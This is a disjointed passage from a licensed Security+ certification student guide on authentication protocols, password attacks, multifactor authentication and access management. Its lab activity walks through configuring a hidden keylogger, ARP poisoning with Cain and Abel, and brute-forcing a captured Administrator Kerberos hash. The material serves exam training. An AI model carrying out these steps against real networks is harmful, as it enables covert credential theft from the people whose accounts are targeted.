does. LMv2 provides a mini-NTLMv2 response that is the same size as an LM
response.
• NTLMv2 Session—provides stronger session key generation for digital signing and
sealing applications (see the Kerberos Authentication section for a discussion of the
use of session keys).
• Anonymous—access for services that do not require user authentication, such as
web servers.
LM/NTLM VULNERABILITIES
The flaws in LM and NTLMv1 would normally be considered a historical curiosity as
these mechanisms are obsolete, but one of the reasons that Windows password
databases can be vulnerable to "cracking" is that they can store LM hash versions of a
password for compatibility with legacy versions of Windows (pre Windows 2000). LM
responses can also be accepted during logon (by default, the client sends both LM and
NTLM responses) and, therefore, captured by a network sniffer.
If this compatibility is not required, it should be disabled, using the local or domain
security policy (LMCompatiblityLevel or "LAN Manager Authentication Level"). Windows
7 and Windows Server 2008 were the first products to ship with LM disabled by default.
NTLM only provides for client authentication, making it vulnerable to Man-in-the-
Middle attacks. It is also vulnerable to a pass-the-hash attack, where an attacker
submits a captured authentication hash rather than trying to obtain the plaintext
password. Finally, it does not support token or biometric authentication. For these
reasons, Microsoft made Kerberos the preferred authentication protocol for Active
Directory® networks. NTLM is still the only choice for workgroups (non-domain
networks). NTLMv2 should be used if possible, following Microsoft Support's security
guidance (https://support.microsoft.com/en-us/help/2793313/security-guidance-
for-ntlmv1-and-lm-network-authentication).
Unless legacy clients must be supported, use policies to force NTLMv2 authentication. (Screenshot used
with permission from Microsoft.)
KERBEROS AUTHENTICATION
Kerberos is a network authentication protocol developed by the Massachusetts
Institute of Technology (MIT) in the 1980s. The protocol has been ratified as a web
standard by the IETF (http://www.ietf.org/rfc/rfc4120.txt). The idea behind Kerberos
is that it provides a single sign-on. This means that once authenticated, a user is
trusted by the system and does not need to re-authenticate to access different
resources. The Kerberos authentication method was selected by Microsoft as the
default logon provider for Windows 2000 and later. Based on the Kerberos 5.0 open
standard, it provides authentication to Active Directory, as well as compatibility with
other, non-Windows, operating systems.
Kerberos was named after the three-headed guard dog of Hades (Cerberus) because it
consists of three parts. Clients request services from a server, which both rely on an
intermediary—a Key Distribution Center (KDC)—to vouch for their identity. There are
two services that make up a KDC: the Authentication Service and the Ticket
Granting Service. The KDC runs on port 88 using TCP or UDP.
Note: The password hash itself is not transmitted over the network.
2. If the user is found in the database and the request is valid (the user's password
hash matches the one in the Active Directory database and the time matches to
within five minutes of the server time), the AS responds with:
• Ticket Granting Ticket (TGT)—this contains information about the client
(name and IP address) plus a timestamp and validity period. This is encrypted
using the KDC's secret key.
• TGS session key for use in communications between the client and the Ticket
Granting Service (TGS). This is encrypted using a hash of the user's shared
secret (the logon password, for instance).
The TGT is an example of a logical token. All the TGT does is identify who you are
and confirm that you have been authenticated—it does not provide you with
access to any domain resources.
Note: The TGT (or user ticket) is time-stamped (under Windows, they have a default
maximum age of 10 hours). This means that workstations and servers on the
network must be synchronized (to within five minutes) or a ticket will be rejected.
This helps to prevent replay attacks.
Presuming the user entered the correct password, the client can decrypt the TGS
session key but not the TGT. This establishes that the client and KDC know the
same shared secret and that the client cannot interfere with the TGT.
To access resources within the domain, the client requests a Service Ticket (a
token that grants access to a target application server). This process of granting
service tickets is handled by the Ticket Granting Service (TGS).
3. The client sends the TGS a copy of its TGT and the name of the application server
it wishes to access plus an authenticator, consisting of a time-stamped client ID
encrypted using the TGS session key.
The TGS should be able to decrypt both messages using the KDC's secret key for
the first, and the TGS session key for the second. This confirms that the request is
genuine. It also checks that the ticket has not expired and has not been used
before (replay attack).
4. The TGS service responds with:
• Service session key—for use between the client and the application server.
This is encrypted with the TGS session key.
• Service ticket—containing information about the user, such as a timestamp,
system IP address, Security Identifier (SID) and the SIDs of groups to which he
or she belongs, and the service session key. This is encrypted using the
application server's secret key.
5. The client forwards the service ticket, which it cannot decrypt, to the application
server and adds another time-stamped authenticator, which is encrypted using
the service session key.
One of the noted drawbacks of Kerberos is that the KDC represents a single point-of-
failure for the network. In practice, backup KDC servers can be implemented (for
example, Active Directory supports multiple domain controllers, each of which will be
running the KDC service).
Kerberos can be implemented with several different algorithms: DES (56-bit), RC4 (128-
bit), or AES (128-bit or better) for session encryption and the MD5 or SHA-1 hash
functions. AES is supported under Kerberos v5, but in terms of Microsoft networking,
only versions Windows Server 2008/Windows Vista and later support it. A suitable
algorithm is negotiated between the client and the KDC.
PASSWORD AUTHENTICATION
The Password Authentication Protocol (PAP) is an unsophisticated authentication
method developed as part of the TCP/IP Point-to-Point Protocol (PPP), used to
transfer TCP/IP data over serial or dial-up connections. It relies on clear text password
exchange and is, therefore, obsolete for the purposes of any sort of secure connection.
It is defined in https://www.ietf.org/rfc/rfc1334.txt.
MS-CHAP
Microsoft Challenge Handshake Authentication Protocol (MS-CHAP) is Microsoft's
first implementation of CHAP, supported by older clients, such as Windows 95. An
enhanced version (MS-CHAPv2) was developed for Windows 2000 and later. MS-
CHAPv2 also supports mutual authentication. Because of the way it uses vulnerable NT
hashes, MS-CHAP should not be deployed without the protection of a secure
connection tunnel so that the credentials being passed are encrypted.
Defining allowed authentication mechanisms on a Windows VPN. (Screenshot used with permission
from Microsoft.)
PASSWORD ATTACKS
When a user chooses a password, the password is converted to a hash using a
cryptographic function, such as MD5 or SHA. This means that, in theory, no one except
the user (not even the system administrator) knows the password as the plaintext
should not be recoverable from the hash. An online password attack is where the
adversary directly interacts with the authentication service—a web login form or VPN
gateway, for instance. The attacker will submit passwords using either a database of
known passwords (and variations) or a list of passwords that have been cracked
offline.
Note: Be aware of horizontal brute force attacks, also referred to as password spraying.
This means that the attacker chooses one or more common passwords (for example,
password or 123456) and tries them in conjunction with multiple usernames.
An online password attack can show up in audit logs as repeatedly failed logons and
then a successful logon, or as several successful logon attempts at unusual times or
locations. Apart from ensuring the use of strong passwords by users, online password
attacks can be mitigated by restricting the number or rate of logon attempts, and by
shunning logon attempts from known bad IP addresses.
Note: Note that restricting logons can be turned into a vulnerability as it exposes you to
Denial of Service attacks. The attacker keeps trying to authenticate, locking out valid
users.
PASSWORD CRACKERS
Password cracker software works on the basis of exploiting known vulnerabilities in
password transmission and storage algorithms (LM and NTLM hashes, for instance).
They can perform brute force attacks and use precompiled dictionaries and rainbow
tables to break naïvely chosen passwords. A password cracker can work on a database
of hashed passwords. This can also be referred to as an offline attack, as once the
password database has been obtained, the cracker does not interact with the
authentication system to perform the cracking. The following locations are used to
store passwords:
• %SystemRoot%\System32\config\SAM—local users and passwords are stored as
part of the Registry (Security Account Manager) on Windows machines.
• %SystemRoot%\NTDS\NTDS.DIT—domain users and passwords are stored in the
Active Directory database on domain controllers.
• On Linux, user account details and encrypted passwords are stored in /etc/passwd,
but this file is universally accessible. Consequently, passwords are moved to /etc/
shadow, which is only readable by the root user.
Also, be aware that there are databases of username and password/password hash
combinations for multiple accounts stored across the Internet. These details derive
from successful hacks of various companies' systems. These databases can be
searched using a site such as https://haveibeenpwned.com.
If the attacker cannot obtain a database of passwords, a packet sniffer might be used
to obtain the client response to a server challenge in a protocol such as NTLM or
CHAP/MS-CHAP. While these protocols avoid sending the hash of the password
directly, the response is derived from the password hash in some way. Password
crackers can exploit weaknesses in a protocol to calculate the hash and match it to a
dictionary word or brute force it.
Some well-known password cracking tools include:
• John the Ripper—multi-platform password hash cracker.
• THC Hydra—often used against remote authentication (protocols such as Telnet,
FTP, HTTPS, SMB, and so on).
• Aircrack—sniffs and decrypts WEP and WPA wireless traffic.
• L0phtcrack—one of the best-known Windows password recovery tools. There is also
an open source version (ophcrack).
• Cain and Abel—Windows password recovery with password sniffing utility.
Cain and Abel password cracker (http://oxid.it). (Screenshot courtesy of Cain and Abel.)
HYBRID ATTACK
A hybrid password attack uses a combination of dictionary and brute force attacks. It
is principally targeted against naively strong passwords, such as james1. The password
cracking algorithm tests dictionary words and names in combination with several
numeric prefixes and/or suffixes. Other types of algorithms can be applied, based on
what hackers know about how users behave when forced to select complex passwords
that they don't really want to make hard to remember. Other examples might include
substituting "s" with "5" or "o" with "0".
KEY STRETCHING
In some security products, an encryption key may be generated from a password. If
the password is weak, an attacker may be able to guess or crack the password to
derive the key. Also, the plain fact is that even a strong password is not a particularly
good seed for a large key. A more secure method of creating a key is through the
generation of a large, random (or pseudo-random) number. This is obviously not a
solution for user passwords, however. It is also not a trivial problem to design a
random number generator that isn't vulnerable to cryptanalysis.
Another technique to make the key generated from a user password stronger is by—
basically—playing around with it lots of times. This is referred to as key stretching.
The initial key may be put through thousands of rounds of hashing. This might not be
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 6: Implementing Identity and Access Management Controls | Topic B
214 | The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update
difficult for the attacker to replicate so it doesn't actually make the key stronger, but it
slows the attack down as the attacker has to do all this extra processing for each
possible key value. Key stretching can be performed by using a particular software
library to hash and save passwords when they are created. Two such libraries are:
• bcrypt—an extension of the crypt UNIX library for generating hashes from
passwords. It uses the Blowfish cipher to perform multiple rounds of hashing.
• Password-Based Key Derivation Function 2 (PBKDF2)—part of RSA security's
public key cryptography standards (PKCS#5).
PASS-THE-HASH ATTACKS
If an attacker can obtain the hash of a user password, it is possible to present the hash
(without cracking it) to authenticate to network protocols such as CIFS. Such attacks are
called Pass-the-Hash (PtH) attacks. One opportunity for widening access to a
Windows domain network using pass-the-hash is for the local administrator account
on a domain PC to be compromised so that the adversary can run malware with local
admin privileges. The malware then scans system memory for cached password
hashes being processed by the Local Security Authority Subsystem Service (lsass.exe).
The adversary will hope to obtain the credentials of a domain administrator logging on
locally or remotely and then replay the domain administrator hash to obtain wider
privileges across the network.
Related to PtH, the secret keys used to secure AD Kerberos tickets are derived from NT
hashes rather than randomly generated; therefore, care must be taken to protect the
hashes from credential dumping or the system becomes vulnerable to ticket-forging
attacks, referred to as a "golden ticket" attack (https://www.youtube.com/watch?
v=lJQn06QLwEw).
The principal defense against these types of attacks is to strongly restrict the
workstations that will accept logon (interactive or remote) from an account with
domain administrative privileges. Domain administrators should only be allowed to log
on to especially hardened workstations, and such workstations must be protected
against physical and network access by any other type of account or process.
Activity 6-2
Discussing Authentication Protocols
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. True or false? In order to create a service ticket, Kerberos passes the user's
password to the target application server for authentication.
False—only the KDC verifies the user credential. The Ticket Granting Service
sends the user's account details (SID) to the target application for authorization
(allocation of permissions), not authentication.
No. This is security by obscurity. The file could probably be easily discovered
using search tools.
Activity 6-3
Cracking Passwords using Software
Tools
SCENARIO
In this activity, you will identify the ways that user credentials can be compromised
through use of spyware and password crackers. This activity is designed to test your
understanding of and ability to apply content examples in the following CompTIA
Security+ objectives:
• 1.2 Compare and contrast types of attacks.
• 2.2 Given a scenario, use appropriate software tools to assess the security posture
of an organization.
g) Check Start at the system loading and all the boxes under Hiding. Select the Apply
button and confirm the UAC prompt with Yes.
h) Select the Logs tab and observe the PC activity that can be logged.
i) Select the Start monitoring button on the toolbar.
j) Select the Hide button on the toolbar then select OK in the warning dialog box.
k) Select the Start button then select the arrow on the Shut down button and select
Log off.
d) Look through the other tabs to see what additional information has been logged.
e) Close Actual Keylogger.
f) Select the Start/Stop Sniffer button and check that the adapter and IP address
have been identified. If the address is not present, restart the VM.
If there is more than one adapter, make sure the one using the IP address 10.1.0.10x
is selected.
Cain Configuration dialog box (http://oxid.it). (Screenshot courtesy of Cain and Abel.)
g) Take a few moments to examine the tabs and options—Cain can perform ARP
poisoning to launch MitM attacks on a switched network and perform digital
certificate spoofing. Select OK.
h) Select the Start/Stop Sniffer button again. If a warning appears, select OK.
i) Select the Sniffer tab. Right-click in the main panel and select Scan MAC Addresses.
In the dialog box, select OK.
j) When Cain detects the other hosts, select the APR tab at the bottom of the window.
k) Select anywhere in the Configuration pane at the top then select the Add button
on the toolbar.
l) In the New APR Poison Routing box, select the 10.1.0.1 host in the left-hand box
then select 10.1.0.10x in the right-hand box.
m) Select OK.
Configuring a poison routing attack (http://oxid.it). (Screenshot courtesy of Cain and Abel.)
c) Select MSKerb5-PreAuth.
The password hash has not been decoded automatically.
Capturing passwords using Cain (http://oxid.it). (Screenshot courtesy of Cain and Abel.)
d) Right-click the MSKerb5-PreAuth record and select Send to Cracker.
e) Select the Cracker tab and select Kerb5 PreAuth Hashes. Right-click the
Administrator account and select Brute-Force Attack.
f) Select Start. Note the time remaining. Select Stop.
g) Select the Custom option and type the following:
pPaAsSwWoOrRdD0123456789$@
h) Under Password length, set both Min and Max boxes to 8
i) Select Start. Note the time remaining—still a substantial coffee break unless you get
lucky! Select Stop. Select Exit.
b) Use the Action menu or the right-click menu in the Hyper-V Manager console to
revert each of the VMs to their saved checkpoints.
Topic C
Implement Multifactor Authentication
EXAM OBJECTIVES COVERED
4.3 Given a scenario, implement identity and access management controls.
The card reader or scanner can either be built into a computer or connected as a USB
peripheral device. A software interface is then required to read (and possibly write)
data from the card. The software should comply with the PKCS#11 API standard. The
latest generation of cards can generate their own keys, which is more secure than
programming the card through software. When the card is read, the card software
usually prompts the user for a PIN or password, which mitigates the risk of the card
being lost or stolen.
As well as being used for computer and network logons, smart cards and proximity
cards can be used as a physical access control to gain access to building premises via
secure gateways.
Note: Near Field Communications (NFC) allows a smartphone to emulate proximity card
standards and be used with standard proximity card readers.
If the smart card format is unsuitable, an authentication token can also be stored on a
special USB drive. A USB-based token can be plugged into a normal USB port.
Note: For information about biochips, refer to https://arstechnica.com/features/
2018/01/a-practical-guide-to-microchip-implants.
There are also 2-step verification mechanisms. These generate a software token on
a server and send it to a resource that is assumed to be safely controlled by the user,
such as a smartphone or email account. Note that this is not strictly a something you
have authentication factor. Anyone intercepting the code within the timeframe could
enter it as something you know without ever possessing or looking at the device
itself.
the HMAC is built from the shared secret plus a value derived from the device's and
server's local timestamps. TOTP automatically expires each token after a short window
(60 seconds, for instance). For this to work, the client device and server must be closely
time-synchronized. TOTP is defined by http://tools.ietf.org/html/rfc6238. One well-
known implementation of HOTP and TOTP is Google Authenticator™.
Two-step verification mechanism protecting web application access. The site sends a Time-based One-
time Password with a duration of five minutes to the registered cell phone by SMS.
Note: Don’t confuse OATH (Open Authentication) with OAuth (Open Authorization).
BIOMETRIC AUTHENTICATION
The first step in setting up biometric authentication is enrollment. The chosen
biometric information is scanned by a biometric reader and converted to binary
information. There are various ways of deploying biometric readers. Most can be
installed as a USB peripheral device. Some types (fingerprint readers) can be
incorporated on a laptop or mouse chassis. Others are designed to work with physical
access control systems.
There are generally two steps in the scanning process:
• A sensor module acquires the biometric sample from the target.
• A feature extraction module records the significant information from the sample
(features that uniquely identify the target).
The biometric template is recorded in a database stored on the authentication server.
When the user wants to access a resource, he or she is re-scanned, and the scan is
compared to the template. If they match to within a defined degree of tolerance,
access is granted. Security of the template and storage mechanism is a key problem
for biometric technologies.
• It should not be possible to use the template to reconstruct the sample.
• The template should be tamper-proof (or at least tamper-evident).
• Unauthorized templates should not be injected.
Standard encryption products cannot be used, as there needs to be a degree of fuzzy
pattern matching between the template and the confirmation scan. Vendors have
developed proprietary biometric cryptosystems to address security.
BIOMETRIC FACTORS
Several different metrics exist for identifying people. These can be categorized as
physical (fingerprint, eye, and facial recognition) or behavioral (voice, signature, and
typing pattern matching). Key metrics and considerations used to evaluate different
technologies include the following:
• False negatives (where a legitimate user is not recognized); referred to as the False
Rejection Rate (FRR) or Type I error.
• False positives (where an interloper is accepted); referred to as the False
Acceptance Rate (FAR) or Type II error.
False negatives cause inconvenience to users, but false positives can lead to security
breaches, and so is usually considered the most important metric.
• Crossover Error Rate (CER)—the point at which FRR and FAR meet. The lower the
CER, the more efficient and reliable the technology.
• Errors are reduced over time by tuning the system. This is typically accomplished by
adjusting the sensitivity of the system until CER is reached.
• Throughput (speed)—this refers to the time required to create a template for each
user and the time required to authenticate. This is a major consideration for high
traffic access points, such as airports or railway stations.
FINGERPRINT SCANNERS
Fingerprint recognition is the most widely implemented biometric technology. A
fingerprint is a unique pattern and thus lends itself to authentication. The technology
required for scanning and recording fingerprints is relatively inexpensive and the
process quite straightforward. Scanning devices are easy to implement, with scanners
incorporated on laptop chassis, mice, keyboards, smartphones, and so on. The
technology is also simple to use and non-intrusive, though it does carry some stigma
from association with criminality. Reader and finger also need to be kept clean and dry.
The main problem with fingerprint scanners is that it is possible to obtain a copy of a
user's fingerprint and create a mold of it that will fool the scanner. The following
articles explain how fingerprint scanners aren't that difficult to fool:
• https://www.tomsguide.com/us/iphone-touch-id-hack,news-20066.html
• http://www.iphonehacks.com/2016/02/iphone-touch-id-hacked-with-play-
doh.html
• https://www.knowyourmobile.com/mobile-phones/apple-touch-id/22918/7-
year-old-hacked-apples-touch-id-simplest-way
A similar option is hand- or palmprint recognition, but this is considered less reliable
and obviously requires bulkier devices.
such as airport security. There is a chance that an iris scanner could be fooled by a
high-resolution photo of someone's eye.
A retinal scan uses an infrared light to identify the pattern of blood vessels in the eye. (Photo by Ghost
Presenter on Unsplash.)
BEHAVIORAL TECHNOLOGIES
Behavioral technologies (sometimes classified as Something you do) are often cheap
to implement but tend to produce more errors than scans based on physical
characteristics. They can also be discriminatory against those with disabilities:
• Voice recognition—this is relatively cheap, as the hardware and software required
are built into many standard PCs and mobiles. However, obtaining an accurate
template can be difficult and time-consuming. Background noise and other
environmental factors can also interfere with logon. Voice is also subject to
impersonation.
• Signature recognition—everyone knows that signatures are relatively easy to
duplicate, but it is more difficult to fake the actual signing process. Signature
matching records the user applying their signature (stroke, speed, and pressure of
the stylus).
• Typing—this matches the speed and pattern of a user’s input of a passphrase.
Other identity documents produced include the First Responder Access Credential
(FRAC)—for emergency services personnel to gain access to federal buildings during an
emergency—and the ePassport (a passport with an embedded smart card).
Note: To learn more, watch the related Video on the course website.
• Consider that using PIV or CACs may be mandatory if you work with or for the U.S.
federal government.
Activity 6-4
Discussing Multifactor Authentication
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
A One-time Password mechanism generates a token that is valid only for a short
period (usually 60 seconds), before it changes again.
2. Apart from cost, what would you consider to be the major considerations for
evaluating a biometric recognition technology?
Error rates (false acceptance and false rejection), throughput, and whether
users will accept the technology or reject it as too intrusive or threatening to
privacy.
5. Your company has won a contract to work with the Department of Defense.
What type of site access credentials will you need to provide?
Contractors working for the DoD require a Common Access Card with an
embedded token and photograph.
Summary
This lesson described the Identification and Authentication components of Identity and
Access Management (IAM) systems.
• You should be able to distinguish identification and authentication processes and
know the different factors that can be used as credentials for authentication.
• You should be able to describe the processes and strengths/weaknesses of
password-based authentication protocols.
• You should be able to compare and contrast the types of systems used to provide
biometric and token-based authentication.
What experience do you have with access control? What types of access control
services are you familiar with?
A: Answers will vary, but may include remote access implementations, such as
using a VPN to provide access to systems and services for remote employees;
establishing permissions, such as sharing files and folders; and implementing
account policies in an organization.
What account management security controls have you come across in your
current job role? Do you think they are sufficient in properly protecting access?
A: Answers will vary, but may include user ID and password guidelines and
requirements. Depending on the organization, the guidelines may be weak and
not strict enough to meet strong password guidelines.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
As well as ensuring that only valid users and devices connect to your networks, you must ensure
that these subjects only receive necessary permissions and privileges to access and change
resources. In this lesson, you will investigate the use of directory services and account
management practices to support the goals of privilege management.
LESSON OBJECTIVES
In this lesson, you will:
• Install and configure authorization and directory services.
• Implement access management controls.
• Differentiate account management practices.
• Implement account auditing and recertification.
Topic A
Install and Configure Authorization and
Directory Services
EXAM OBJECTIVES COVERED
2.6 Given a scenario, implement secure protocols.
4.1 Compare and contrast identity and access management concepts.
4.2 Given a scenario, install and configure identity access services.
In many organizations, directory services are vital to maintaining identity and access
definitions for all users, computers, and any other entity requiring network access.
You'll configure these services to uphold security principles.
IMPLICIT DENY
Access controls are usually founded on the principle of implicit deny; that is, unless
there is a rule specifying that access should be granted, any request for access is
denied. This principle can be seen clearly in firewall policies. A firewall filters access
requests using a set of rules. The rules are processed in order from top-to-bottom. If a
request does not fit any of the rules, it is handled by the last (default) rule, which is to
refuse the request.
File access controls work on the same principle. An account must be listed on the ACL
to gain access. Any other request for access is denied.
LEAST PRIVILEGE
A complementary principle is that of least privilege. This means that a user should be
granted rights necessary to perform their job and no more.
Note: These principles apply equally to users (people) and software processes. Much
software is written without regard to the principles of implicit deny and least privilege,
making it less secure than it should be.
SINGLE SIGN-ON
Single Sign-On (SSO) means that a user only has to authenticate to a system once to
gain access to all the resources to which the user's account has been granted rights. An
example is the Kerberos authentication and authorization model. This means, for
example, that a user authenticated with Windows® is also authenticated with the
Windows domain's SQL Server® and Exchange Server services. The advantage of single
sign-on is that each user does not have to manage multiple user accounts and
passwords. The disadvantage is that compromising the account also compromises
multiple services.
Note: It is critical that users do not re-use work passwords or authentication information
on third-party sites. Of course, this is almost impossible to enforce, so security managers
have to rely on effective user training.
Browsing objects in an Active Directory LDAP schema. (Screenshot used with permission from
Microsoft.)
The types of attributes, what information they contain, and the way object types are
defined through attributes (some of which may be required, and some optional) is
described by the directory schema. Some of the attributes commonly used include
Common Name (CN), Organizational Unit (OU), Organization (O), Country (C), and
Domain Component (DC). For example, the Distinguished Name of a web server
operated by Widget in the UK might be:
CN=WIDGETWEB, OU=Marketing, O=Widget, C=UK, DC=widget, DC=com
Where LDAP can be queried from some sort of web application, the application design
needs to prevent the possibility of LDAP injection attacks. For example, if the web
application presents a search form to allow the user to query a directory, a malicious
user may enter a search string that includes extra search filters. If the input string is
not properly validated, this could allow the user to bypass authentication or inject a
different query, possibly allowing the attacker to return privileged information, such as
a list of usernames or even passwords.
ENTERPRISE AUTHENTICATION
Enterprise networks and ISPs potentially need to support hundreds or thousands of
users and numerous different remote and wireless access technologies and devices.
The problem arises that each remote access device needs to be configured with
authentication information and this information needs to be synchronized between
them. A scalable authentication architecture can be developed using the RADIUS or
TACACS+ protocols. Under both these protocols, authentication, authorization, and
accounting are performed by a separate server (the AAA server). Network access
devices, such as switches, routers, VPN access servers, or wireless access points,
function as client devices of the AAA server. Rather than storing authentication
information, they pass this data between the AAA server and the remote user.
on the authentication method, there may be another step where the AAA server
issues an Access-Challenge, which must be relayed by the RADIUS client.
6. The client checks an authenticator in the response packet; if it is valid and an
Access-Accept packet is returned, the client authenticates the user. The client then
generates an Accounting-Request (Start) packet and transmits it to the server (on
port 1813). It then opens a session with the user.
7. The server processes the Accounting-Request and replies with an Accounting-
Response.
8. When the session is closed (or interrupted), the client and server exchange
Accounting-Request (Stop) and Response packets.
(except for the header identifying the packet as TACACS+ data), rather than just the
authentication data. TACACS+ is more often used for device administration than for
authenticating end user devices. It allows centralized control of accounts set up to
manage routers, switches, and firewall appliances, as well as detailed management of
the privileges assigned to those accounts.
Note: A TACACS protocol was developed in the 1980s and upgraded by Cisco as the
proprietary protocol XTACACS in the 1990s. TACACS+ is incompatible with both of these.
FEDERATION
The proliferation of online accounts that users must manage and keep secure when
interacting with work and consumer services, in the office and online, is a substantial
threat to the security of all the networks with which the user has accounts. It also
exposes people to risks, such as identity theft. The goal of Internet single-sign on,
where a user has a single ID that they can use to authenticate against any network, is a
very long way off. However, many Internet businesses are developing federated
networks, allowing users to share a single set of credentials between multiple service
providers.
Federation is the notion that a network needs to be accessible to more than just a
well-defined group, such as employees. In business, a company might need to make
parts of its network open to partners, suppliers, and customers, and likewise have
parts of its network open to its staff. The company can manage its staff accounts easily
enough. Managing accounts for each supplier or customer internally may be more
difficult. Federation means that the company trusts accounts created and managed by
a different network. As another example, in the consumer world, a user might want to
use both Google Apps™ and Twitter. If Google and Twitter establish a federated
network for the purpose of authentication and authorization, then the user can log on
to Twitter using his or her Google credentials or vice versa.
In these models, the networks perform federated identity management. The
networks establish trust relationships so that the identity of a user (the principal) from
network A (the identity provider) can be trusted as authentic by network B (the
service provider). As well as trusts, the networks must establish the communications
links and protocols that allow users to authenticate and be authorized with access
permissions and rights.
Note: As well as sign-on mechanisms, there also needs to be a way for the user to sign
out securely (from each different site) and perform other elements of session
management to prevent replay attacks.
TRANSITIVE TRUST
Different kinds of trust relationships can be created to model different kinds of
business or organizational relationships. Each network can be thought of as a domain.
Domains can establish parent-child or peer relationships.
• One-way trust—child trusts parent but parent does not trust child. For example,
Domain B might be configured to trust Domain A. Users from Domain A can be
authorized to access resources on Domain B. Users from Domain B, however, are
not trusted by Domain A.
• Two-way trust—the domains are peers, and both trust one another equally.
A trust relationship can also be non-transitive or transitive:
• Non-transitive trust—the trust relationship remains only between those domains.
SHIBBOLETH
Shibboleth (http://shibboleth.net) is an open source implementation of SAML. The
main components of Shibboleth are as follows:
• Identity Provider—supports the authentication of users. The software can be
integrated with LDAP, Kerberos, X.509, and other directory and authentication
systems.
• Embedded Discovery Service—allows the user to select a preferred identity
provider.
• Service Provider—processes calls for user authentication by contacting the user's
preferred identity provider and processing the authentication request and
authorization response. The service provider can be used with the IIS and Apache
web servers.
OpenID
OpenID was the standard underpinning early "sign on with" features of websites. A
solution such as SAML is typical of an enterprise-controlled federated identity
management solution. OpenID is an example of a "user-centric" version of federated
identity management. It allows users to select their preferred identity provider. This
allows a consumer website, referred to as the relying party (RP), to accept new users
without having to go through an account creation step first, improving availability.
For example, fantastic-holidays.com wants to quickly accept authenticated users to
participate in live chat with sales staff. It wants to authenticate users to reduce misuse
of the chat application but does not want to force potential users to complete a sign-
up form, which might act as a deterrent and reduce sales opportunities. Consequently,
it becomes a relying party accepting Google.com or Live.com as identity providers.
Later, if fantastic-holidays.com wins a sale and needs more information about the user,
it can associate that identity with additional profile information, such as billing details.
This profile information is owned and stored by fantastic-holidays.com and not shared
with the identity provider.
Note: fantastic-holidays.com remains (rather surprisingly) unregistered as a live domain
at the time of writing, but for the avoidance of doubt, this scenario is fictional and is not
intended to represent any actual company.
This model proved relatively complicated for developers, however, and OAuth was
often deployed as a sort of proxy authentication mechanism, with the reasoning that if
the user was authorized by the OAuth provider, then they must also have been
authenticated. However, for a site to present this to the user as a simple
authentication mechanism is misleading, as the site can also request an authorization
(or privilege to do something with the user's profile data).
Meanwhile, technical issues with OpenID (notably incompatibility with native mobile
applications) limited adoption of that protocol too.
To resolve these issues, a new set of functions and communication flows was added to
the OAuth protocol and called OpenID Connect (OIDC). OpenID Connect replaces
OpenID to provide an identity management layer over the OAuth 2 protocol so that a
site can request an "authentication service" only.
Activity 7-1
Discussing Authorization and Directory
Services
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
To store information about network resources and users in a format that can be
accessed and updated using standard queries.
True.
5. You are working with a cloud services company to use their identity
management services to allow users to authenticate to your network. The
company will not establish a transitive trust between their network system
and yours to allow you to access and update user profiles. Why would they
refuse this and what impact will it have on your application?
They would have to obtain user consent for your network to access their profile
and this may be difficult for them to do. You will have to create and store a
profile for the user on your own system.
6. You are working on a cloud application that allows users to log on with
social media accounts over the web and from a mobile application. Which
protocols would you consider and which would you choose as most suitable?
Topic B
Implement Access Management Controls
EXAM OBJECTIVES COVERED
4.3 Given a scenario, implement identity and access management controls.
4.4 Given a scenario, differentiate common account management practices.
systems founded on discretionary access from the sort of misconfiguration that can
occur through DAC.
One example is forcing applications such as web browsers to run in a "sandbox" mode
to prevent malicious scripts on a website from using the privileges of the logged-on
user to circumvent the security system. A key point is that privileges are restricted
regardless of the user's identity.
Configuring an access control entry for a folder. (Screenshot used with permission from Microsoft.)
Database security is similar, but the range of objects that can be secured with fine-
grained permissions is wider. Objects in a database schema include the database itself,
tables, views, rows (records), and columns (fields). Different policies can be applied for
statements, such as SELECT, INSERT, UPDATE, and DELETE.
Note: Network ACLs are implemented by routers and firewalls.
privileges, typically with access to run programs and to create and modify files
belonging only to their profile. Administrative or privileged accounts are able to
install and remove programs and drivers, change system-level settings, and access any
object in the file system.
Each OS also typically has a default privileged account. In Windows, this account is
called Administrator; in Linux, it is called root. It is best practice only to use these
accounts to install the OS. Subsequently, they should be disabled or left unused. One
or more accounts with administrative privileges are then created for named system
admins (so that their actions can be audited). This makes it harder for attackers to
identify and compromise an administrative account. This can be referred to as generic
account prohibition.
Note: It is a good idea to restrict the number of administrative accounts as far as
possible. The more accounts there are, the more likely it is that one of them will be
compromised. On the other hand, you do not want administrators to share accounts, as
that compromises accountability.
In Windows, the privileges for these accounts are assigned to local group accounts (the
Users and Administrators groups) rather than directly to the user account itself. In
Linux, privileged accounts are typically configured by adding either a user or a group
account to the /etc/sudoers file.
SERVICE ACCOUNTS
Service accounts are often used by scheduled processes, such as maintenance tasks,
or may be used by application software, such as databases, for account or system
access. Windows has several service account types. These do not accept user
interactive logons but can be used to run processes and background services:
• System—has the most privileges of any Windows account. The System account
creates the host processes that start Windows before the user logs on. Any process
created using the System account will have full privileges over the local computer.
• Local Service—has the same privileges as the standard user account. It can only
access network resources as an anonymous user.
• Network Service—has the same privileges as the standard user account but can
present the computer's account credentials when accessing network resources.
Linux also uses the concept of service accounts to run applications such as web servers
and databases. These accounts are usually created by the server application package
manager. Users can be prevented from logging into these accounts (often by setting
the password to an unknown value and denying shell access).
Note: Be aware of the risk of using a personal account when a service account is
appropriate. If you use a personal account and the user changes the password or the
account is disabled for some reason, then the service will fail to run, which can cause
serious problems with business applications.
USER-ASSIGNED PRIVILEGES
The simplest (meaning the least sophisticated) type of privilege management is user-
assigned privileges. In this model, each user is directly allocated rights. This model is
only practical if the number of users is small. This is typically true of discretionary
access control.
GROUP-BASED PRIVILEGES
Group-based privilege management simplifies and centralizes the administrative
process of assigning rights by identifying sets of users that require the same rights. The
administrator can then assign access rights to the group and membership of a group
